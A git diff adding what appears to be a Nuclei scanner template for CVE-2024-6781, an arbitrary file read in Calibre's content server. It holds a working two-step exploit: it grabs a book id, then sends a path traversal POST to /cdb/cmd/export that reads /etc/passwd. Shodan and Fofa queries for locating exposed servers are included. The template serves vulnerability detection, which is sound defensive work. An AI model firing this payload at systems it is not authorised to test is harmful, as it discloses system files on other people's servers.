diff --git a/http/cves/2024/CVE-2024-6781.yaml b/http/cves/2024/CVE-2024-6781.yaml new file mode 100644 index 0000000000..a65ed39c60 --- /dev/null +++ b/http/cves/2024/CVE-2024-6781.yaml @@ -0,0 +1,55 @@ +id: CVE-2024-6781 + +info: + name: Calibre <= 7.14.0 Arbitrary File Read + author: DhiyaneshDK + severity: high + description: | + Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0. + reference: + - https://starlabs.sg/advisories/24/24-6781/ + metadata: + shodan-query: html:"Calibre" + fofa-query: "Server: calibre" + verified: true + max-requeset: 1 + tags: cve,cve2024,calibre,lfi + +http: + - raw: + - | + GET /interface-data/books-init HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: book_ids + internal: true + json: + - '.search_result.book_ids[0]' + + - raw: + - | + POST /cdb/cmd/export HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + ["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""] + + matchers-condition: and + matchers: + - type: word + part: content_type + words: + - "application/json" + + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - '"result":' + condition: and + + - type: status + status: + - 200